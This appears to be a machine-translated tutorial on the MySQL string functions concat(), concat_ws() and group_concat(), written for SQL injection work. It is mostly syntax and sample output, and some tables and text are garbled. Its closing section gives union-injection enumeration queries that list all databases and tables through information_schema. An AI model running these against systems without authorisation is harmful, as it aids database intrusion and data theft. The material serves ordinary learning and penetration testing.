foreword
When selecting data, we often need to connect the data and then echo it. In many cases, when you want to output multiple data or multiple lines of data, you need to use the string concatenation function. In SQLi, common string concatenation functions are concat(), group_concat(), concat_ws() .
This article explains the above three functions in detail. At the same time, mysql is used for description here, and other types of databases should be tested by yourself.
concat() function
When not using the string concatenation function,
SELECT id,name FROM info LIMIT 1; returns
+----+--------+
| id | name |
+----+--------+
| 1 | BioCyc |
+----+-------+
But one problem here is that when using union joint injection, we all know that joint injection requires the same number of columns before and after the two selections. Here id and name are two columns. When we want one column, (of course It is not ruled out that you first reveal the id, and then reveal the name, in two steps) What should I do? ----concat()
concat() syntax and usage characteristics:
CONCAT(str1,str2,…)
returns the string generated by the connection parameters. If any parameter is NULL, the return value is NULL. There can be one or more parameters.
Example of use:
SELECT CONCAT(id, ',', name) AS con FROM info LIMIT 1; the returned result is
+ ---------- +
| with |
+ ---------- +
| 1, BioCyc |
+ ---------- +
Generally, we have to separate each item with a character to facilitate the viewing of data.
SELECT CONCAT('My', NULL,'QL'); returns
+--------------------------+
| CONCAT('My ', NULL, 'QL') |
+--------------------------+
|NULL |
+--------- -----------------+
CONCAT_WS() function
CONCAT_WS() stands for CONCAT With Separator and is a special form of CONCAT(). The first parameter is the delimiter for other parameters. The position of the separator is placed between the two strings to be concatenated. The delimiter can be a string or other parameters. If the delimiter is NULL, the result is NULL. The function ignores NULL values after any delimiter argument. But CONCAT_WS() doesn't ignore any empty strings. (However, all NULLs are ignored).
concat() syntax and usage features:
CONCAT_WS(separator,str1,str2,…)
Separator is the separator between characters
Example of use:
SELECT CONCAT_WS('_',id,name)AS con_ws FROM info LIMIT 1; The return result is
+----------+
| con_ws |
+----------+
| 1_BioCyc |
+------------+
SELECT CONCAT_WS(',','Firstname',NULL,'Last Name');返回结果为
+----------------------------------------------+
| CONCAT_WS(',','First name',NULL,'Last Name') |
+----------------------------------------------+
| First name,LastName |
+----------------------------------------------+
GROUP_CONCAT() function
The GROUP_CONCAT function returns a string result that is composed by concatenating the values in the group.
Using the table info as an example, the return result of the statement SELECT locus,id,journal FROM info WHERE locus IN('AB086827','AF040764'); is
+----------+----+ --------------------------+
| locus | id |journal |
+----------+---- +--------------------------+
| AB086827 | 1 |Unpublished |
| AB086827 | 2 | Submitted (20-JUN-2002) |
| AF040764 | 23 |Unpublished |
| AF040764 | 24 | Submitted (31-DEC-1997) |
+----------+----+------------- -------------+
1. Use syntax and features:
GROUP_CONCAT ([DISTINCT] expr [,expr ...]
[ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] [,col ...]]
[SEPARATOR str_val])
In MySQL, you can get the concatenated value of a combination of expressions. Duplicate values can be excluded by using DISTINCT. If you want to sort the values in the result, you can use the ORDER BY clause.
SEPARATOR is a string value that is used to insert into the resulting value. Defaults to a comma (","), which can be completely removed by specifying SEPARATOR "".
A maximum length can be set via the variable group_concat_max_len. The syntax executed at runtime is as follows: SET [SESSION | GLOBAL] group_concat_max_len =unsigned_integer;
If a maximum length is set, the resulting value is clipped to this maximum length. If the grouped characters are too long, you can set the system parameters: SET@@global.group_concat_max_len=40000;
2. Example of use:
statement SELECT locus,GROUP_CONCAT(id) FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus; The return result is
| locus |GROUP_CONCAT(id) |
+----------+------------------+
| AB086827 |1,2 |
| AF040764 |23,24 |
+----------+------------------+
语句 SELECT locus,GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') FROM info WHERE locus IN('AB086827','AF040764')GROUP BY locus;的返回结果为
+----------+----------------------------------------------------------+
| locus |GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') |
+----------+----------------------------------------------------------+
| AB086827 |2_1 |
| AF040764 |24_23 |
+----------+----------------------------------------------------------+
语句SELECT locus,GROUP_CONCAT(concat_ws(', ',id,journal)ORDER BY id DESC SEPARATOR '. ') FROM info WHERE locusIN('AB086827','AF040764') GROUP BY locus;的返回结果为
+----------+--------------------------------------------------------------------------+
| locus |GROUP_CONCAT(concat_ws(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') |
+----------+--------------------------------------------------------------------------+
| AB086827 | 2, Submitted (20-JUN-2002). 1,Unpublished |
| AF040764 | 24, Submitted (31-DEC-1997) . 23,Unpublished |
+----------+--------------------------------------------------------------------------+
3. General usage in sql injection
list all databases
select group_concat(schema_name) from information_schema.schemata
List all tables in a library
select group_concat(table_name) from information_schema.tableswhere table_schema='xxxxx'